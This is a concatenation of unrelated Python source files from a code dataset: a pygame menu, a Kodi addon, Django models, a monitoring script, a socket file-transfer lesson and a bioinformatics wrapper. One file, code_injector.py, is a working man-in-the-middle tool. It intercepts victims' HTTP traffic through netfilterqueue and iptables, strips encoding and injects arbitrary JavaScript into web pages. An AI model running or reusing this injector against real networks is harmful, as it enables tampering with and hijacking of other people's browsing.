return bowler_filter\n","sub_path":"q05_create_bowler_filter/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644993299","text":"import pygame\nimport functions\nimport pyautogui\nimport input_box\nimport os\n\npygame.init()\nscreen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\nscreen_width, screen_height = pyautogui.size()\n\nfolder_path_box = input_box.input_box(screen_width/3.2, screen_height/4, 200, 50, text='', updatable=True, save_responsive=True)\nfile_extension = input_box.input_box(screen_width/3.2, screen_height/2.8, 200, 50, text='', updatable=True, save_responsive=True)\nget_all_extensions_button = input_box.input_box(screen_width/3.2, screen_height/2.15, 200, 50, text='get files with all extensions', updatable=False, save_responsive=False)\nconfirm_button = input_box.input_box(screen_width/2.85, screen_height/1.41, 200, 50, text='here', updatable=False, save_responsive=True)\ninreasing_button = input_box.input_box(screen_width/3.2, screen_height/1.74, 200, 50, text='increasing', updatable=False, save_responsive=False)\ndecreasing_button = input_box.input_box(screen_width/2.43, screen_height/1.74, 200, 50, text='decreasing', updatable=False, 
save_responsive=False)\n\nclass menu:\n    def __init__(self):\n        self.active = True\n        self.rect = pygame.Rect(screen_width/3.3, screen_height/4.8, 1, screen_height/1.87)\n\n    def check_path_input(self):\n        try:\n            os.listdir(folder_path_box.text)\n            return True\n        except (FileNotFoundError, OSError):\n            functions.write_text(\"Warning: path not found.\", 30, (255, 112, 77), screen_width / 5.6, screen_height / 3.9, screen)\n            return False\n\n    def handle_events(self):\n        while self.active == True:\n            screen.fill((230, 242, 255))\n            pygame.draw.rect(screen, (255, 102, 102), self.rect, 2)\n            self.check_path_input()\n\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE) or confirm_button.active == True and self.check_path_input() == True:\n                    self.active = False\n\n                if decreasing_button.active == False:\n                    inreasing_button.handle_event(event)\n                if inreasing_button.active == False:\n                    decreasing_button.handle_event(event)\n\n                folder_path_box.handle_event(event)\n                confirm_button.handle_event(event)\n                file_extension.handle_event(event)\n                get_all_extensions_button.handle_event(event)\n\n            functions.write_text(\"Where should I look for files?\", 40, (255, 102, 102), screen_width/3.2, screen_height/5, screen)\n            functions.write_text(\"Files extension:\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 3.25, screen)\n            functions.write_text(\"If you want to sort files with all extensions, click\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 2.4, screen)\n            functions.write_text(\"Date of modification should be increasing or decreasing?\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 1.9, screen)\n            functions.write_text(\"Click\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 1.4, screen)\n            functions.write_text(\"if you are ready.\", 40, (255, 102, 102), screen_width / 2.58, screen_height / 1.4, screen)\n\n            inreasing_button.update()\n            decreasing_button.update()\n            folder_path_box.update()\n            confirm_button.update()\n            file_extension.update()\n            get_all_extensions_button.update()\n\n            inreasing_button.draw(screen)\n            decreasing_button.draw(screen)\n            folder_path_box.draw(screen)\n            confirm_button.draw(screen)\n            file_extension.draw(screen)\n            get_all_extensions_button.draw(screen)\n\n            pygame.display.update()\n","sub_path":"menu_loop.py","file_name":"menu_loop.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465328999","text":"###############################################################################\r\n#\r\n# Title:       Fargo\r\n# Author:      Qzofp Productions\r\n# Version:     0.5\r\n#\r\n# File:        fargo.py\r\n#\r\n# Created on Jun 18, 2014\r\n# Updated on Jun 19, 2014\r\n#\r\n# Description: Export addon configuration to the fargo.addon.settings.js file.\r\n#\r\n###############################################################################\r\n\r\nimport os\r\n\r\nimport xbmc\r\nimport xbmcaddon\r\nimport xbmcgui\r\n\r\n__settings__ = xbmcaddon.Addon(\"webinterface.fargo\")\r\ncWeb = __settings__.getSetting(\"website\")\r\ncPath = xbmc.translatePath(__settings__.getAddonInfo('path'))\r\ncFilename = 'fargo.addon.settings.js'\r\n\r\ncFile = os.path.join(cPath, cFilename)\r\n\r\nFileHandler = open(cFile, 'w')\r\nFileHandler.write('var cFARGOSITE = \"' + cWeb + '\";')\r\nFileHandler.close()\r\n\r\nxbmcgui.Dialog().ok(\"Fargo Export\", \"Web Site Address successfully 
exported.\")","sub_path":"_xbmc_addon/webinterface.fargo/resources/lib/fargo.py","file_name":"fargo.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"625754979","text":"import netfilterqueue\nfrom scapy.layers.l2 import Raw\nfrom scapy.layers.inet import IP, TCP\nimport argparse\nimport os\nfrom termcolor import cprint\nimport re\n\nEND_TAG = '' #TAG to be replaced in HTML load\nSCRIPT_TAG = '' #TAG to be insert in HTML load\nPORT = 80 #PORT for detection of packets (80 HTTP, 10000 HTTPS with SSLstrip)\nLINE = '____________________________________________________________'\n\n\ndef process_packet(packet):\n '''\n Process each packet on Network filter queue\n '''\n\n global PORT\n #Evaluate IP packet filtered\n IP_pkt = IP(packet.get_payload())\n \n #If the IP packet has TCP layer and Raw Layer (it can be HTTP packet)\n if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP):\n try:\n #Decode load of TCP packet\n load = IP_pkt[Raw].load.decode()\n \n #IP packet from the victim to the server\n #destination port = 80 (port of HTTP server)\n if IP_pkt[TCP].dport == PORT:\n cprint('Request', 'red', attrs=['bold',])\n \n '''Search for Accept-Encoding Header (?\\\\r\\\\n = stop at first occurrence of \\\\r\\\\n)\n Remove Accept-Encoding header from request(we don't understand any encoding)\n Remove also Chunked-Encoding by using HTTP/1.0\n '''\n load = re.sub('Accept-Encoding:.*?\\\\r\\\\n', '', load)\n load = load.replace('HTTP/1.1', 'HTTP/1.0')\n IP_pkt[Raw].load = load\n\n #Scapy recomputes them\n del IP_pkt[IP].len\n del IP_pkt[IP].chksum\n del IP_pkt[TCP].chksum\n\n packet.set_payload(bytes(IP_pkt))\n\n #IP packet from the server to the victim\n #source port = 80 (port of HTTP server)\n elif IP_pkt[TCP].sport == PORT:\n cprint('Response', 'blue', attrs=['bold',])\n load = injection_code(load)\n\n IP_pkt[Raw].load = load\n \n #Scapy recomputes them\n del IP_pkt[IP].len\n del IP_pkt[IP].chksum\n del IP_pkt[TCP].chksum\n\n packet.set_payload(bytes(IP_pkt))\n \n except UnicodeDecodeError:\n #If python convertion (decode) fails for some bytes\n #(No HTML code, so I don't want to analyse this packet)\n pass\n \n packet.accept()\n\ndef injection_code(load):\n '''\n Injection of javascript code in HTML load\n '''\n\n global END_TAG, SCRIPT_TAG\n\n #If the HTML page has TAG, I'm going to replace it with javascript code\n load = load.replace(END_TAG, SCRIPT_TAG+END_TAG)\n #If ?: for group (), group used to locate expression but it's not stored in expression\n content_length_header = re.search(\"(?:Content-Length:\\s)(\\d*)\", load)\n\n if content_length_header and 'text/html' in load:\n content_length = content_length_header.group(1)\n print(f'Length {content_length}', end='')\n new_length = int(content_length) + len(SCRIPT_TAG)\n print(f' {new_length}')\n load = load.replace(content_length, str(new_length))\n print(f' {load}')\n\n return load\n\n\ndef args_parser():\n '''\n Parser of command line argument\n '''\n\n global SCRIPT_TAG\n \n #Parser of command line arguments\n parser = argparse.ArgumentParser()\n\n #Initialization of needed arguments\n parser.add_argument(\"-local\", \"-l\", dest=\"local\", help=\"If specified, IPTABLES updated to run program on local. Otherwise it works on forward machine (e.g. 
with arp spoofing).\", action='store_true')\n parser.add_argument(\"-file\", \"-f\", dest=\"file\", help=\"Name of javascript file to use.\")\n parser.add_argument(\"-https\", dest=\"https\", help=\"If specified, it bypass HTTPS connection. Otherwise, it works on HTTP connection.\", action='store_true')\n\n #Parse command line arguments\n args = parser.parse_args()\n\n if args.file and os.path.exists(args.file) and os.path.isfile(args.file) and ('.js') in args.file:\n f = open(args.file, 'r')\n code = f.read().replace('\\n', '')\n SCRIPT_TAG = SCRIPT_TAG.replace('CODE', code)\n print(SCRIPT_TAG)\n else:\n cprint('\\n\\n[ERROR] Missing file', 'red', attrs=['bold',], end='\\n\\n')\n parser.print_help()\n exit(1)\n\n return args.local, args.https\n\ndef main():\n global PORT\n local, https = args_parser()\n\n #Packets are blocked and not forwarded\n if local or https:\n os.system('iptables -F')\n os.system('iptables -I INPUT -j NFQUEUE --queue-num 0')\n os.system('iptables -I OUTPUT -j NFQUEUE --queue-num 0')\n \n if https:\n os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')\n \n else:\n os.system('iptables -F')\n os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')\n\n if https:\n PORT = 10000\n\n #queue num = 0\n queue = netfilterqueue.NetfilterQueue()\n queue.bind(0, process_packet)\n\n try:\n cprint(f'\\nTCP packets\\n{LINE}','green', attrs=['bold',])\n queue.run()\n except KeyboardInterrupt:\n queue.unbind()\n cprint(f'\\n{LINE}','green', attrs=['bold',])\n print('Flushing ip table.', end='\\n')\n cprint(f'{LINE}','green', attrs=['bold',], end='\\n\\n')\n os.system('iptables -F')\n\n\nif __name__=='__main__':\n\tmain()\n","sub_path":"Hacking/code_injector/code_injector.py","file_name":"code_injector.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228604861","text":"from django.db import models\n\nDEFAULT_RANKING = 1000\n\n# Create your models here.\n\nclass Player(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n ranking = models.IntegerField(default=DEFAULT_RANKING)\n\n\nclass Game(models.Model):\n first_player = models.ForeignKey(Player, related_name='first_player')\n second_player = models.ForeignKey(Player, related_name='second_player')\n # encode the result somehow\n date = models.DateTimeField('day played')\n result = models.BooleanField() # make it a custom field\n\n\n# add as many things as possible to the model or not??\n","sub_path":"results/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"376075105","text":"import argparse\nimport json\nimport os\nimport socket\n\nimport logging\nfrom time import sleep\n\nimport requests\n\nfrom cua import Queue, Config\n\nlogger = logging.getLogger('newrelic_counter_queue')\nnewrelic_guid = \"com.webgeoservices.counter_queue\"\n\ndef parse_config_file(config_file):\n config_values = {}\n try:\n config = open(config_file, 'r')\n except IOError:\n logger.error(\"newrelic sysmond config file is unreachable\")\n return False\n else:\n for line in config.readlines():\n if line[0] != \"#\" and len(line.strip()) != 0:\n config_var = line.split(\"=\")\n config_values[config_var[0].strip()] = config_var[1].strip()\n config.close()\n return config_values\n\n\ndef set_environment_variables(config_values):\n if 
\"NEWRELIC_LICENCE_KEY\" not in os.environ:\n os.environ[\"NEWRELIC_LICENCE_KEY\"] = config_values.get(\"license_key\", \"\")\n if \"NEWRELIC_HOSTNAME\" not in os.environ:\n if \"hostname\" in config_values:\n os.environ[\"NEWRELIC_HOSTNAME\"] = config_values[\"hostname\"]\n else:\n hostname = socket.gethostname()\n os.environ[\"NEWRELIC_HOSTNAME\"] = hostname\n\n\ndef setup_arg_parser():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--log', dest='loglevel', default=\"ERROR\",\n help='Define LogLevel')\n return parser\n\ndef setup_logger(loglevel):\n logger.setLevel(loglevel)\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\n logger.addHandler(console_handler)\n\ndef set_headers():\n headers = {\n 'X-License-Key': os.environ.get(\"NEWRELIC_LICENCE_KEY\", None),\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n return headers\n\ndef set_datas(queue_state):\n process_id = os.getpid()\n lvm_datas = {\n \"agent\": {\n \"host\": os.environ[\"NEWRELIC_HOSTNAME\"],\n \"pid\": process_id,\n \"version\": \"0.0.1\"\n },\n \"components\": [\n {\n \"name\": os.environ[\"NEWRELIC_HOSTNAME\"],\n \"guid\": newrelic_guid,\n \"duration\": 60,\n \"metrics\": {\n \"Component/queue/Todo/[Count]\": int(queue_state['todo']),\n \"Component/queue/Doing/[Count]\": int(queue_state['doing']),\n \"Component/queue/Failed/[Count]\": int(queue_state['failed'])\n }\n }\n ]\n }\n return lvm_datas\n\n\ndef post_response(headers, datas):\n response = requests.post(\n \"https://platform-api.newrelic.com/platform/v1/metrics\",\n json.dumps(datas),\n headers=headers\n )\n\n if response.status_code != 200:\n try:\n json_response = json.loads(response.content)\n logger.error(json_response[\"error\"])\n except:\n logger.critical(response.content)\n else:\n resp = response.json()\n logger.info(json.dumps(datas))\n logger.info(\"\"\"Send datas to Newrelic : %s\"\"\"%resp[\"status\"])\n\n\ndef main():\n parser = setup_arg_parser()\n args = parser.parse_args()\n loglevel = args.loglevel\n setup_logger(getattr(logging, loglevel.upper(), None))\n redis_config = Config(\n host=os.environ.get('COUNTER_REDIS_HOST', ''),\n port=os.environ.get('COUNTER_REDIS_PORT', 6379),\n database=os.environ.get('COUNTER_REDIS_DATABASE', 1),\n prefix=os.environ.get('COUNTER_REDIS_QUEUE_PREFIX', 'counter')\n )\n queue = Queue(redis_config)\n\n while True:\n try:\n queue_state = {\n 'todo': queue.get_todo_count(),\n 'doing': queue.get_doing_count(),\n 'failed': queue.get_failed_count()\n }\n headers = set_headers()\n datas = set_datas(queue_state)\n post_response(headers=headers, datas=datas)\n sleep(60)\n except KeyboardInterrupt:\n exit()\n\n\nif __name__ == \"__main__\":\n exit(main())","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27619291","text":"import random\nimport requests\n\n\ndef ip2long(ip):\n ipnum = 0\n iplist = ip.split('.')\n for i in range(4):\n ipnum = ipnum + int(iplist[i]) * 256 ** (3 - i)\n\n return ipnum\n\n\ndef long2ip(ipnum):\n iplist = []\n\n for i in range(4):\n iplist.append(ipnum % 256)\n ipnum = ipnum // 256\n\n ip = ''\n for i in range(4):\n ip += str(iplist[3 - i])\n if i == 3:\n break\n ip += '.'\n\n return ip\n\n\ndef maskToIpNum(ip):\n ips = ip.split('/')\n count = int(ips[1])\n ipstr = ips[0]\n\n ipnum = ip2long(ipstr)\n mask = 0\n 
for i in range(count):\n        mask = mask | (0x01 << (31 - i))\n\n    startip = ipnum & mask\n    endip = startip + 2 ** (32 - count) - 1\n    print(long2ip(startip))\n    print(long2ip(endip))\n\n\"\"\"\n192.168.1.1/24\n192.168.1.1/25\n\"\"\"\n\nif __name__ == '__main__':\n    maskToIpNum('192.168.1.1/32')\n\n\n\n\n","sub_path":"OnlyTest.py","file_name":"OnlyTest.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35500565","text":"# ch05_netapi.py\n# Define a class NetAPI to utilize NetworkIO to send/recv data.\nimport socket, struct, sys\n\ndef server(host, port):\n    import os\n    typename = { int:'int', str:'str', bytes:'bytes', float:'float' } # dict\n    listeningSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    listeningSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    listeningSock.bind( (host, port) )\n    listeningSock.listen()\n    print(\"Listening at\", listeningSock.getsockname())\n\n    while True:\n        sock, sockname = listeningSock.accept()\n        handle = NetAPI(sock)\n        while True:\n            data = handle.recv_file() # It will receive a dict (P.5-8,5-24)\n            if not data:\n                break\n            print('receive from {}\\n{}'.format(sockname, data))\n            save_file(data, os.path.join(NetAPI.savePath, sockname[0]))\n        sock.close()\n\n    listeningSock.close()\n\ndef save_file(fileInfo, dir):\n    import os, shutil\n    filename = fileInfo.get(NetAPI.FILE_NAME_TAG)\n    filesize = fileInfo.get(NetAPI.FILE_SIZE_TAG)\n    content = fileInfo.get(NetAPI.FILE_CONTENT_TAG)\n    tempFile = fileInfo.get(NetAPI.FILE_BLOCKS_TAG)\n    if not filename or not filesize: return False\n    if not content and not tempFile:\n        return False\n    else:\n        fullname = os.path.join(dir, filename)\n        dirname = os.path.dirname(fullname)\n        if not os.path.exists(dirname):\n            os.makedirs(dirname)\n        if content: # 如果是整個 content 送過來\n            if len(content) != filesize:\n                raise RuntimeError('size mismatches')\n            with open(fullname, 'wb') as fp:\n                fp.write(content)\n        else: # 以 blocks 傳過來, 已存於暫存檔\n            if os.path.getsize(tempFile) != filesize:\n                raise RuntimeError('size mismatches')\n            shutil.move(tempFile, fullname)\n        return True\n\ndef client(host, port):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.connect( (host, port) )\n\n    handle = NetAPI(sock)\n    while True:\n        fn = input(\"Input filename to transmit -- \")\n        if fn == '': break\n        handle.send_file(fn)\n\n    sock.close()\n\nclass NetAPI:\n    # Constants defined in P.5-4\n    FILE_TAG_SIZE = 8\n    FILE_END_TAG = b'FILEEND0'\n    FILE_NAME_TAG = b'FILENAME'\n    FILE_SIZE_TAG = b'FILESIZE'\n    FILE_CONTENT_TAG = b'FILEDATA'\n    FILE_ABORT_TAG = b'FILEABRT'\n    FILE_BLOCKS_TAG = b'FILEBLKS'\n    savePath = '/home/solomon/Waste/SavedFiles' # 存檔目錄\n\n    def __init__(self, iHandle=None, oHandle=None):\n        if not iHandle:\n            iHandle = b''\n        if not oHandle:\n            oHandle = iHandle\n        from ch05_networkio import NetworkIO\n        self.iHandle = NetworkIO(iHandle)\n        self.oHandle = NetworkIO(oHandle)\n        self.maxSize = 2147483647 # 最大檔案限制\n        self.blockSize = 4 # 區塊大小\n\n    def send_tag(self, tag): self.oHandle.write_raw(tag)\n    def recv_tag(self): return self.iHandle.read_raw(self.FILE_TAG_SIZE)\n\n    def send_data(self, data): self.oHandle.write(data)\n    def recv_data(self): return self.iHandle.read()\n\n    def send_size(self, n): return self.send_data(n)\n    def recv_size(self):\n        size = self.recv_data()\n        if not isinstance(size, int): # 檢查類別是否為 int\n            raise TypeError('Invalid size type %s' % type(size))\n        return size\n\n    def send_name(self, s): return self.send_data(s)\n    def recv_name(self):\n        path = 
self.recv_data()\n        if not isinstance(path, str): # 檢查是否為 str\n            raise TypeError('Invalid size type %s' % type(path))\n        return path\n\n    def send_content(self, d): return self.send_data(d)\n    def recv_content(self): return self.recv_data()\n\n    def send_file(self, path):\n        import os\n        filename = normalize_name(path)\n        filesize = os.path.getsize(path)\n        filedata = open(path, 'rb').read()\n        try:\n            self.send_tag(self.FILE_NAME_TAG)\n            self.send_name(filename)\n            self.send_tag(self.FILE_SIZE_TAG)\n            self.send_size(filesize)\n            if filesize > self.blockSize:\n                self.send_tag(self.FILE_BLOCKS_TAG)\n                self.send_blocks(filename)\n            else:\n                self.send_tag(self.FILE_CONTENT_TAG)\n                self.send_content(filedata)\n            self.send_tag(self.FILE_END_TAG)\n            return True\n        except Exception as e:\n            print(str(e))\n            self.send_tag(self.FILE_ABORT_TAG)\n            return False\n\n    def recv_file(self):\n        result = {}\n        while True:\n            tag = self.recv_tag()\n            if not tag or tag in [self.FILE_END_TAG, self.FILE_ABORT_TAG]: break\n            if tag == self.FILE_BLOCKS_TAG:\n                tempFile = self.recv_blocks()\n                result[tag] = tempFile\n            else:\n                data = self.recv_data()\n                if not data: break\n                # print(tag, data)\n                if tag == self.FILE_NAME_TAG:\n                    namelist = data.split('/')\n                    if '..' in namelist:\n                        print('Path:', data)\n                        raise ValueError('dangerous path')\n                result[tag] = data\n        return result\n\n    def send_blocks(self, fileName):\n        fp = open(fileName, 'rb')\n        blockID = 0\n        totalSize = 0\n        print(\"[DEBUG] Sending blocks\")\n        while True:\n            block = fp.read(self.blockSize)\n            if not block: break\n            blockID += 1\n            self.send_data(blockID)\n            print(\"[DEBUG] sending block #{}: \".format(blockID), end=' ')\n            self.send_data(block)\n            print(block)\n            totalSize += len(block)\n        self.send_data(0)\n        return totalSize\n\n    def recv_blocks(self):\n        import os, time\n        totalSize = 0\n        lastBlockID = 0\n        fileName = os.path.abspath(os.path.join(self.savePath, \\\n            'TEMP%x' % int(time.time())))\n        dirname = os.path.dirname(fileName)\n        if not os.path.exists(dirname):\n            os.makedirs(dirname)\n        with open(fileName, 'wb') as fp:\n            while True:\n                blockID = self.recv_data()\n                print(\"[DEBUG]\", blockID)\n                assert isinstance(blockID, int)\n                # if not isinstance(blockID, int):\n                #     raise TypeError('invalid type of block id %s' % \\\n                #         type(blockID))\n                if blockID == 0: # End of blocks\n                    break\n                assert lastBlockID + 1 == blockID\n                # if lastBlockID + 1 != blockID:\n                #     raise ValueError('block ID error.' 
\\\n # 'Last: %d current: %d' % (lastBlockID, blockID))\n lastBlockID = blockID\n block = self.recv_data()\n print(\"[DEBUG]\", block)\n assert not isinstance(block, bytes) \n # if not isinstance(block, bytes):\n # raise TypeError('invalid type of block %s' % \\\n # type(block))\n assert len(block) + totalSize > self.maxSize\n # if len(block) + totalSize > self.maxSize:\n # raise RuntimeError('exceed max file size limit %d' % \\\n # self.maxSize)\n fp.write(block)\n return fileName\n\n # End of class NetAPI\n\ndef split_path(path):\n import os.path\n result = []\n while True:\n head, tail = os.path.split(path)\n if tail:\n result.insert(0, tail)\n path = head\n else:\n head = head.strip('/:\\\\')\n if head: result.insert(0, head)\n break\n return result\n\ndef normalize_name(path):\n aList = split_path(path)\n result = \"/\".join(aList)\n return result\n\ndef main():\n msg = \"Usage: %s {server|client} host port\" % sys.argv[0]\n if len(sys.argv) != 4:\n print(msg)\n else:\n host = sys.argv[2]\n port = int(sys.argv[3])\n if sys.argv[1] == \"server\":\n server(host, port)\n elif sys.argv[1] == \"client\":\n client(host, port)\n else:\n print(msg)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"1082/python-trojan/lesson12/ex2/ch05_netapi.py","file_name":"ch05_netapi.py","file_ext":"py","file_size_in_byte":8467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148425516","text":"# -*- coding: utf-8 -*-\n# Copyright 2017 by Rob Gilmore and Shaurita Hutchins. All rights reserved.\n# Based on ClustalOmega wrapper copyright 2011 by Andreas Wilm.\n#\n# Wrapper for Guidance2 by Rob Gilmore (2017). http://guidance.tau.ac.il/ver2/\n# Used _ClustalOmega.py as template.\n#\n# This code is part of the Biopython distribution and governed by its\n# license. Please see the LICENSE file that should have been included\n# as part of this package.\n\"\"\"Command line wrapper for GUIDANCE2\n\nIt weights, filters or masks unreliably aligned positions in multiple sequence alignments.\"\"\"\n\nfrom __future__ import print_function\nfrom pathlib import Path\nfrom Bio.Application import _Option, _Argument, AbstractCommandline\nimport os\n\n\nclass Guidance2Commandline(AbstractCommandline):\n \"\"\"uCommand line wrapper for GUIDANCE2.\n http://guidance.tau.ac.il/ver2/\n Example:\n --------\n\n \\>>> from Bio.Align.Applications import Guidance2Commandline\n\n You would typically run the command line with clustalomega_cline() or via\n the Python subprocess module, as described in the Biopython tutorial.\n Citation:\n ---------\n Sela, I., Ashkenazy, H., Katoh, K. and Pupko, T. (2015)\n GUIDANCE2: accurate detection of unreliable alignment regions accounting for the uncertainty of multiple parameters.\n Nucleic Acids Research, 2015 Jul 1; 43 (Web Server issue): W7-W14.; doi: 10.1093/nar/gkq443\n\n Landan, G., and D. Graur. (2008).\n Local reliability measures from sets of co-optimal multiple sequence alignments.\n Pac Symp Biocomput 13:15-24\n \"\"\"\n\n\n def __init__(self, cmd=\"guidance\", align=True, **kwargs):\n # order parameters in the same order as invoking guidance on the cmd line (e.g. 
'perl guidance.pl')\n        if align is True:\n            self.parameters = \\\n                [\n                    # Required Parameters\n                    _Option(['--seqFile', 'seqFile'],\n                            \"Input sequence file in FASTA format\",\n                            filename=True, equate=False, is_required=True,\n                            checker_function=lambda x: str(Path(x).suffix) in ['.fasta', '.fna', '.ffn', '.faa', '.fra']\n                                                       and Path(x).is_file()),\n                    _Option(['--msaProgram', 'msaProgram'],\n                            \"Which MSA program to use\",\n                            equate=False, is_required=True,\n                            checker_function=lambda x: x in ['MAFFT', 'PRANK', 'CLUSTALW', 'MUSCLE']),\n                    _Option(['--seqType', 'seqType'],\n                            \"Type of sequences for alignment (amino acids, nucleotides, or codons)\",\n                            equate=False, is_required=True,\n                            checker_function=lambda x: x in ['aa', 'nuc', 'codon']),\n                    _Option(['--outDir', 'outDir'],\n                            \"Output directory that will be created \"\n                            \"automatically and hold all output files [please provide full (and not relative) path]\",\n                            filename=True, equate=False, is_required=True),\n\n                    # Optional Parameters\n                    _Option(['--program', 'program'],\n                            \"[GUIDANCE2|GUIDANCE|HoT] Default=GUIDANCE2\",\n                            equate=False,\n                            checker_function=lambda x: x in [\"GUIDANCE2\", \"GUIDANCE\", \"HoT\"]),\n                    _Option(['--bootstraps', 'bootstraps'],\n                            \"Number of bootstrap iterations (only for GUIDANCE). Default=100\",\n                            equate=False,\n                            checker_function=lambda x: isinstance(x, int)),\n                    _Option(['--genCode', 'genCode'],\n                            \"Genetic code identifier (only for codon sequences). Default=1 \\\n                            1) Nuclear Standard\\\n                            15) Nuclear Blepharisma\\\n                            6) Nuclear Ciliate\\\n                            10) Nuclear Euplotid\\\n                            2) Mitochondria Vertebrate\\\n                            5) Mitochondria Invertebrate\\\n                            3) Mitochondria Yeast\\\n                            13) Mitochondria Ascidian\\\n                            9) Mitochondria Echinoderm\\\n                            14) Mitochondria Flatworm\\\n                            4) Mitochondria Protozoan\",\n                            equate=False,\n                            checker_function=lambda x: isinstance(x, int)),\n                    _Option(['--outOrder', 'outOrder'],\n                            \"[aligned|as_input] default=aligned\",\n                            equate=False,\n                            checker_function=lambda x: x in ['aligned', 'as_input']),\n                    _Option(['--msaFile', 'msaFile'],\n                            \"Input alignment file - not recommended\",\n                            filename=True, equate=False,\n                            checker_function=lambda x: Path(x).is_file()),\n                    # Confidence scores\n                    _Option(['--seqCutoff', 'seqCutoff'],\n                            \"Confidence cutoff between 0 to 1. Default=0.6\",\n                            equate=False,\n                            checker_function=lambda x: isinstance(x, (int, float))),\n                    _Option(['--colCutoff', 'colCutoff'],\n                            \"Confidence cutoff between 0 to 1. Default=0.93\",\n                            equate=False,\n                            checker_function=lambda x: isinstance(x, (int, float))),\n                    # Alignment Programs\n                    _Option(['--mafft', 'mafft'],\n                            \"path to mafft executable. Default=mafft\",\n                            filename=True, equate=False,\n                            checker_function=lambda x: Path(x).is_file()),\n                    _Option(['--prank', 'prank'],\n                            \"path to prank executable. Default=prank\",\n                            filename=True, equate=False,\n                            checker_function=lambda x: Path(x).is_file()),\n                    _Option(['--muscle', 'muscle'],\n                            \"path to muscle executable. default=muscle\",\n                            filename=True, equate=False,\n                            checker_function=lambda x: Path(x).is_file()),\n                    _Option(['--pagan', 'pagan'],\n                            \"path to pagan executable, default=pagan\",\n                            filename=True, equate=False,\n                            checker_function=lambda x: Path(x).is_file()),\n                    _Option(['--ruby', 'ruby'],\n                            \"path to ruby executable. default=ruby\",\n                            filename=True, equate=False,\n                            checker_function=lambda x: Path(x).is_file()),\n                    # Miscellaneous\n                    _Option(['--dataset', 'dataset'],\n                            \"Unique name for the Dataset - will be used as prefix to outputs (default=MSA)\",\n                            equate=False),\n                    _Option(['--MSA_Param', 'MSA_Param'],\n                            \"passing parameters for the alignment program e.g. -F to prank. \"\n                            \"To pass parameter containing '-' in it, add \\ before each '-' e.g. \\-F for PRANK\",\n                            equate=False),\n                    _Option(['--proc_num', 'proc_num'],\n                            \"number of processors to use (default=1)\",\n                            equate=False,\n                            checker_function=lambda x: isinstance(x, int))\n                    # Other Guidance scripts\n                ]\n\n        AbstractCommandline.__init__(self, cmd, **kwargs)  # __init__ returns None; initialise first, then read the bound attribute\n        maskDir = self.outDir\n\n        if 'maskCutoff' in kwargs.keys():\n            if 'maskDir' in kwargs.keys():\n                maskDir = kwargs['maskDir']\n            os.chdir(maskDir)\n            cmd = \"maskLowScoreResidues\"\n            self.parameters = \\\n                [\n                    _Argument(['maskFile'],\n                              \"Input alignment file for masking.\",\n                              filename=True, is_required=True),\n                    _Argument(['rprScores'],\n                              \"Residue pair Residue reliability scores.\",\n                              filename=True, is_required=True),\n                    _Argument(['output'],\n                              \"Absolute path of output file.\",\n                              filename=True, is_required=True),\n                    _Argument(['maskCutoff'],\n                              \"Confidence cutoff between 0 to 1.\",\n                              filename=True, is_required=True),\n                    _Argument(['seqType'],\n                              \"Type of sequences for alignment (amino acids or nucleotides)\",\n                              is_required=True,\n                              checker_function=lambda x: x in ['aa', 'nuc'])\n                ]\n        AbstractCommandline.__init__(self, cmd, **kwargs)\n\n\n","sub_path":"OrthoEvol/Orthologs/Align/guidance2.py","file_name":"guidance2.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"492822054","text":"__author__ = 'luispeinado'\n\n\n### Generate the oversampling of classes 2, 4 and 5 to train against class 3 and validate against class 1\n\n\nimport sys\nsys.path.insert(0, '../lib/')\nsys.path.append( '../lib')\nimport lib.utils as ut\nimport lib.caffe_utils as cut\nimport lib.sampling_util as smpl\n\n\nbase_path= \"/vol/pfc/data/datasets/\"\n\nmeans_path=\"/vol/pfc/data/means/\"\n\n\n\nsequences=[ \"Sequence2\",\"Sequence4\",\"Sequence5\"]\nsequences=[ \"Sequence_2_4_5\"]\n\nfor seq in sequences:\n    smpl.generate_oversample_from_file(base_path+seq,base_path+seq+\"_oversampled\")\n    lmdb_path= cut.generate_lmbd_dataset(base_path+seq+\"_oversampled\",base_path+seq+\"_oversampled\"+\"_240_320\",\"240\",\"320\")\n    